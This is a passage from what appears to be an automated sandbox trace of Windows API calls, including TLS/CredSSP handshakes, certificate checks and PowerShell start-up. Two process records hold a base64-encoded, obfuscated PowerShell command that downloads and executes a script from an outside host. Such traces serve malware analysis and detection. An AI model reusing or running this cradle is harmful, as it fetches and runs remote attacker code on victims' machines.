	[0789.283] RtlMoveMemory (in: Destination=0x1b9b22e0, Source=0x2b0e24, Length=0x2e | out: Destination=0x1b9b22e0) 
	[0789.283] CoTaskMemFree (pv=0x1b9b22e0) 
	[0789.283] lstrlenW (lpString="CREDSSP") returned 7
	[0789.283] CoTaskMemAlloc (cb=0x12) returned 0x1b9adde0
	[0789.283] RtlMoveMemory (in: Destination=0x1b9adde0, Source=0x2b0e52, Length=0x10 | out: Destination=0x1b9adde0) 
	[0789.283] CoTaskMemFree (pv=0x1b9adde0) 
	[0789.283] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0789.283] CoTaskMemAlloc (cb=0x4a) returned 0x1b9c0020
	[0789.283] RtlMoveMemory (in: Destination=0x1b9c0020, Source=0x2b0e62, Length=0x48 | out: Destination=0x1b9c0020) 
	[0789.283] CoTaskMemFree (pv=0x1b9c0020) 
	[0789.284] FreeContextBuffer (in: pvContextBuffer=0x2b0a50 | out: pvContextBuffer=0x2b0a50) returned 0x0
	[0789.291] GetCurrentProcess () returned 0xffffffffffffffff
	[0789.291] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcd38 | out: TokenHandle=0x1c7dcd38*=0x3e4) returned 1
	[0789.295] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x30d2658, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c7dcc48, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c7dcc38, ptsExpiry=0x1c7dcc30 | out: phCredential=0x1c7dcc38, ptsExpiry=0x1c7dcc30) returned 0x0
	[0790.439] InitializeSecurityContextW (in: phCredential=0x1c7dce40, phContext=0x0, pTargetName=0x30c7078, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c7dce30, pOutput=0x30d4da0, pfContextAttr=0x1c7dce28, ptsExpiry=0x1c7dce20 | out: phNewContext=0x1c7dce30, pOutput=0x30d4da0, pfContextAttr=0x1c7dce28, ptsExpiry=0x1c7dce20) returned 0x90312
	[0790.440] FreeContextBuffer (in: pvContextBuffer=0x1b997a30 | out: pvContextBuffer=0x1b997a30) returned 0x0
	[0804.198] send (s=0x4a4, buf=0x30d4e70*, len=118, flags=0) returned 118
	[0804.201] recv (in: s=0x4a4, buf=0x30d4e70, len=5, flags=0 | out: buf=0x30d4e70*) returned 5
	[0804.304] recv (in: s=0x4a4, buf=0x30d4e75, len=93, flags=0 | out: buf=0x30d4e75*) returned 93
	[0804.305] InitializeSecurityContextW (in: phCredential=0x1c7dcd60, phContext=0x1c7dd010, pTargetName=0x30c7078, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x30d5180, Reserved2=0x0, phNewContext=0x1c7dcd50, pOutput=0x30d51a0, pfContextAttr=0x1c7dcd48, ptsExpiry=0x1c7dcd40 | out: phNewContext=0x1c7dcd50, pOutput=0x30d51a0, pfContextAttr=0x1c7dcd48, ptsExpiry=0x1c7dcd40) returned 0x90312
	[0804.320] recv (in: s=0x4a4, buf=0x30d5290, len=5, flags=0 | out: buf=0x30d5290*) returned 5
	[0804.320] recv (in: s=0x4a4, buf=0x30d52b5, len=2556, flags=0 | out: buf=0x30d52b5*) returned 2556
	[0804.321] InitializeSecurityContextW (in: phCredential=0x1c7dcc90, phContext=0x1c7dcf40, pTargetName=0x30c7078, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x30d5d88, Reserved2=0x0, phNewContext=0x1c7dcc80, pOutput=0x30d5da8, pfContextAttr=0x1c7dcc78, ptsExpiry=0x1c7dcc70 | out: phNewContext=0x1c7dcc80, pOutput=0x30d5da8, pfContextAttr=0x1c7dcc78, ptsExpiry=0x1c7dcc70) returned 0x90312
	[0804.324] recv (in: s=0x4a4, buf=0x30d5e98, len=5, flags=0 | out: buf=0x30d5e98*) returned 5
	[0804.324] recv (in: s=0x4a4, buf=0x30d5ebd, len=331, flags=0 | out: buf=0x30d5ebd*) returned 16
	[0804.324] recv (in: s=0x4a4, buf=0x30d5ecd, len=315, flags=0 | out: buf=0x30d5ecd*) returned 315
	[0804.351] InitializeSecurityContextW (in: phCredential=0x1c7dcbc0, phContext=0x1c7dce70, pTargetName=0x30c7078, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x30d60d8, Reserved2=0x0, phNewContext=0x1c7dcbb0, pOutput=0x30d60f8, pfContextAttr=0x1c7dcba8, ptsExpiry=0x1c7dcba0 | out: phNewContext=0x1c7dcbb0, pOutput=0x30d60f8, pfContextAttr=0x1c7dcba8, ptsExpiry=0x1c7dcba0) returned 0x90312
	[0804.351] recv (in: s=0x4a4, buf=0x30d61e8, len=5, flags=0 | out: buf=0x30d61e8*) returned 5
	[0804.351] recv (in: s=0x4a4, buf=0x30d620d, len=4, flags=0 | out: buf=0x30d620d*) returned 4
	[0804.351] InitializeSecurityContextW (in: phCredential=0x1c7dcaf0, phContext=0x1c7dcda0, pTargetName=0x30c7078, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x30d62e8, Reserved2=0x0, phNewContext=0x1c7dcae0, pOutput=0x30d6308, pfContextAttr=0x1c7dcad8, ptsExpiry=0x1c7dcad0 | out: phNewContext=0x1c7dcae0, pOutput=0x30d6308, pfContextAttr=0x1c7dcad8, ptsExpiry=0x1c7dcad0) returned 0x90312
	[0804.376] FreeContextBuffer (in: pvContextBuffer=0x1b9904e0 | out: pvContextBuffer=0x1b9904e0) returned 0x0
	[0804.376] send (s=0x4a4, buf=0x30d63d8*, len=134, flags=0) returned 134
	[0804.376] recv (in: s=0x4a4, buf=0x30d63d8, len=5, flags=0 | out: buf=0x30d63d8*) returned 5
	[0804.462] recv (in: s=0x4a4, buf=0x30d63dd, len=1, flags=0 | out: buf=0x30d63dd*) returned 1
	[0804.463] InitializeSecurityContextW (in: phCredential=0x1c7dca20, phContext=0x1c7dccd0, pTargetName=0x30c7078, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x30d6550, Reserved2=0x0, phNewContext=0x1c7dca10, pOutput=0x30d6570, pfContextAttr=0x1c7dca08, ptsExpiry=0x1c7dca00 | out: phNewContext=0x1c7dca10, pOutput=0x30d6570, pfContextAttr=0x1c7dca08, ptsExpiry=0x1c7dca00) returned 0x90312
	[0804.463] recv (in: s=0x4a4, buf=0x30d6660, len=5, flags=0 | out: buf=0x30d6660*) returned 5
	[0804.463] recv (in: s=0x4a4, buf=0x30d6685, len=48, flags=0 | out: buf=0x30d6685*) returned 48
	[0804.463] InitializeSecurityContextW (in: phCredential=0x1c7dc950, phContext=0x1c7dcc00, pTargetName=0x30c7078, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x30d6788, Reserved2=0x0, phNewContext=0x1c7dc940, pOutput=0x30d67a8, pfContextAttr=0x1c7dc938, ptsExpiry=0x1c7dc930 | out: phNewContext=0x1c7dc940, pOutput=0x30d67a8, pfContextAttr=0x1c7dc938, ptsExpiry=0x1c7dc930) returned 0x0
	[0805.205] QueryContextAttributesW (in: phContext=0x1c7dcbb0, ulAttribute=0x4, pBuffer=0x30d68c0 | out: pBuffer=0x30d68c0) returned 0x0
	[0806.987] QueryContextAttributesW (in: phContext=0x1c7dcbb0, ulAttribute=0x5a, pBuffer=0x30d6940 | out: pBuffer=0x30d6940) returned 0x0
	[0806.997] QueryContextAttributesW (in: phContext=0x1c7dca60, ulAttribute=0x53, pBuffer=0x30d6c90 | out: pBuffer=0x30d6c90) returned 0x0
	[0811.428] CertDuplicateCRLContext (pCrlContext=0x1b98bf60) returned 0x1b98bf60
	[0811.431] CertDuplicateStore (hCertStore=0x1b96d120) returned 0x1b96d120
	[0811.433] CertEnumCertificatesInStore (hCertStore=0x1b96d120, pPrevCertContext=0x0) returned 0x1b98bfe0
	[0811.433] CertDuplicateCRLContext (pCrlContext=0x1b98bfe0) returned 0x1b98bfe0
	[0811.434] CertEnumCertificatesInStore (hCertStore=0x1b96d120, pPrevCertContext=0x1b98bfe0) returned 0x1b98bf60
	[0811.434] CertDuplicateCRLContext (pCrlContext=0x1b98bf60) returned 0x1b98bf60
	[0811.434] CertEnumCertificatesInStore (hCertStore=0x1b96d120, pPrevCertContext=0x1b98bf60) returned 0x0
	[0811.434] CertCloseStore (hCertStore=0x1b96d120, dwFlags=0x0) returned 1
	[0811.434] CertFreeCRLContext (pCrlContext=0x1b98bf60) returned 1
	[0812.861] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1b96d050
	[0812.862] CertAddCRLLinkToStore (in: hCertStore=0x1b96d050, pCrlContext=0x1b98bfe0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0814.312] CertAddCRLLinkToStore (in: hCertStore=0x1b96d050, pCrlContext=0x1b98bf60, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0827.345] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b98bf60, pTime=0x1c7dca68, hAdditionalStore=0x1b96d050, pChainPara=0x1c7dca70, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c7dca60 | out: ppChainContext=0x1c7dca60) returned 1
	[0845.983] CertDuplicateCertificateChain (pChainContext=0x1cca4d30) returned 0x1cca4d30
	[0845.985] CertDuplicateCRLContext (pCrlContext=0x1b98bf60) returned 0x1b98bf60
	[0845.985] CertDuplicateCRLContext (pCrlContext=0x1ccedf30) returned 0x1ccedf30
	[0845.985] CertDuplicateCRLContext (pCrlContext=0x1ccedfb0) returned 0x1ccedfb0
	[0845.985] CertFreeCertificateChain (pChainContext=0x1cca4d30) 
	[0845.986] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cca4d30, pPolicyPara=0x1c7dcbe8, pPolicyStatus=0x1c7dcbc8 | out: pPolicyStatus=0x1c7dcbc8) returned 1
	[0845.987] SetLastError (dwErrCode=0x0) 
	[0845.992] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cca4d30, pPolicyPara=0x1c7dccc0, pPolicyStatus=0x1c7dcca8 | out: pPolicyStatus=0x1c7dcca8) returned 1
	[0855.853] CertFreeCertificateChain (pChainContext=0x1cca4d30) 
	[0855.853] CertFreeCRLContext (pCrlContext=0x1b98bf60) returned 1
	[0857.464] EncryptMessage (in: phContext=0x1c7dd270, fQOP=0x0, pMessage=0x30d9538, MessageSeqNo=0x0 | out: pMessage=0x30d9538) returned 0x0
	[0857.464] send (s=0x4a4, buf=0x30d9278*, len=117, flags=0) returned 117
	[0858.659] setsockopt (s=0x4a4, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0858.660] recv (in: s=0x4a4, buf=0x30d96e0, len=5, flags=0 | out: buf=0x30d96e0) returned -1
	[0858.661] WSAEventSelect (s=0x4a4, hEventObject=0x0, lNetworkEvents=0) returned 0
	[0858.661] CoTaskMemAlloc (cb=0x204) returned 0x1b9cad30
	[0858.661] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2745, dwLanguageId=0x0, lpBuffer=0x1b9cad30, nSize=0x101, Arguments=0x0 | out: lpBuffer="An established connection was aborted by the software in your host machine.\r\n") returned 0x4d
	[0858.661] CoTaskMemFree (pv=0x1b9cad30) 
	[0918.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c7d8cc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c7d8c10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c7d8c10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c7d8c10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.185] CryptAcquireContextA (in: phProv=0x1c7d7888, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x1c7d7888*=0x1b958db0) returned 1
	[0923.919] CoTaskMemAlloc (cb=0x104) returned 0x320d00
	[0923.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x320d00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0923.919] CoTaskMemFree (pv=0x320d00) 

Thread:
	id = 1500
	os_tid = 0xb80


Thread:
	id = 1502
	os_tid = 0x1904


Thread:
	id = 1531
	os_tid = 0x2018

	[0752.265] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0752.269] ResetEvent (hEvent=0x38c) returned 1
	[0858.652] GetSystemInfo (in: lpSystemInfo=0x1b50dd70 | out: lpSystemInfo=0x1b50dd70*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0905.405] CoUninitialize () 

Thread:
	id = 1766
	os_tid = 0x1ac4


Thread:
	id = 1774
	os_tid = 0x1c3c


Thread:
	id = 1855
	os_tid = 0x2490

	[0862.410] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0891.064] QueryContextAttributesW (in: phContext=0x1cf8efd0, ulAttribute=0x1a, pBuffer=0x1cf8f150 | out: pBuffer=0x1cf8f150) returned 0x0
	[0898.247] DeleteSecurityContext (phContext=0x1cf8e7a0) returned 0x0
	[0906.072] shutdown (s=0x4a4, how=2) returned 0
	[0906.072] setsockopt (s=0x4a4, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0906.072] closesocket (s=0x4a4) returned 0

Process:
	id = "65"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x20cc5000"
	os_pid = "0xf5c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "11"
	os_parent_pid = "0x984"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 315
	os_tid = 0xf60


Thread:
	id = 385
	os_tid = 0xa60


Thread:
	id = 387
	os_tid = 0xbd0


Process:
	id = "66"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x21408000"
	os_pid = "0xf64"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "7"
	os_parent_pid = "0x7b4"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 316
	os_tid = 0xf68

	[0467.535] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0469.073] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0469.073] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0469.074] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0469.074] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0475.797] GetVersionExW (in: lpVersionInformation=0x12db60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12db60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0475.800] GetVersionExW (in: lpVersionInformation=0x12db60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12db60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0476.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.468] GetVersionExW (in: lpVersionInformation=0x12d8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0476.469] SetErrorMode (uMode=0x1) returned 0x1
	[0476.470] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12da30 | out: lpFileInformation=0x12da30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0476.471] SetErrorMode (uMode=0x1) returned 0x1
	[0476.474] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dca0 | out: lpdwHandle=0x12dca0) returned 0x94c
	[0476.476] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cc72a0 | out: lpData=0x2cc72a0) returned 1
	[0476.479] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dc18, puLen=0x12dc10 | out: lplpBuffer=0x12dc18*=0x2cc733c, puLen=0x12dc10) returned 1
	[0476.481] lstrlenW (lpString="䅁") returned 1
	[0476.490] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2cc7418, puLen=0x12db80) returned 1
	[0476.491] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0476.493] CoTaskMemAlloc (cb=0x2e) returned 0x361c00
	[0476.493] lstrcpyW (in: lpString1=0x361c00, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0476.494] CoTaskMemFree (pv=0x361c00) 
	[0476.494] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2cc746c, puLen=0x12db80) returned 1
	[0476.494] lstrlenW (lpString="System.Management.Automation") returned 28
	[0476.494] CoTaskMemAlloc (cb=0x3c) returned 0x299e80
	[0476.494] lstrcpyW (in: lpString1=0x299e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0476.494] CoTaskMemFree (pv=0x299e80) 
	[0476.494] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2cc74c8, puLen=0x12db80) returned 1
	[0476.494] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0476.494] CoTaskMemAlloc (cb=0x20) returned 0x3620e0
	[0476.495] lstrcpyW (in: lpString1=0x3620e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0476.495] CoTaskMemFree (pv=0x3620e0) 
	[0476.495] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2cc7508, puLen=0x12db80) returned 1
	[0476.495] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0476.495] CoTaskMemAlloc (cb=0x44) returned 0x299e80
	[0476.495] lstrcpyW (in: lpString1=0x299e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0476.495] CoTaskMemFree (pv=0x299e80) 
	[0476.495] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2cc7570, puLen=0x12db80) returned 1
	[0476.495] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0476.495] CoTaskMemAlloc (cb=0x76) returned 0x2fd6d0
	[0476.495] lstrcpyW (in: lpString1=0x2fd6d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0476.495] CoTaskMemFree (pv=0x2fd6d0) 
	[0476.495] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2cc760c, puLen=0x12db80) returned 1
	[0476.495] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0476.495] CoTaskMemAlloc (cb=0x44) returned 0x299e80
	[0476.495] lstrcpyW (in: lpString1=0x299e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0476.495] CoTaskMemFree (pv=0x299e80) 
	[0476.495] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2cc7670, puLen=0x12db80) returned 1
	[0476.495] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0476.495] CoTaskMemAlloc (cb=0x58) returned 0x2b5dd0
	[0476.495] lstrcpyW (in: lpString1=0x2b5dd0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0476.495] CoTaskMemFree (pv=0x2b5dd0) 
	[0476.495] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2cc76ec, puLen=0x12db80) returned 1
	[0476.495] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0476.495] CoTaskMemAlloc (cb=0x20) returned 0x3620e0
	[0476.495] lstrcpyW (in: lpString1=0x3620e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0476.495] CoTaskMemFree (pv=0x3620e0) 
	[0476.495] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2cc7394, puLen=0x12db80) returned 1
	[0476.495] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0476.495] CoTaskMemAlloc (cb=0x66) returned 0x2dc220
	[0476.496] lstrcpyW (in: lpString1=0x2dc220, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0476.496] CoTaskMemFree (pv=0x2dc220) 
	[0476.496] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x0, puLen=0x12db80) returned 0
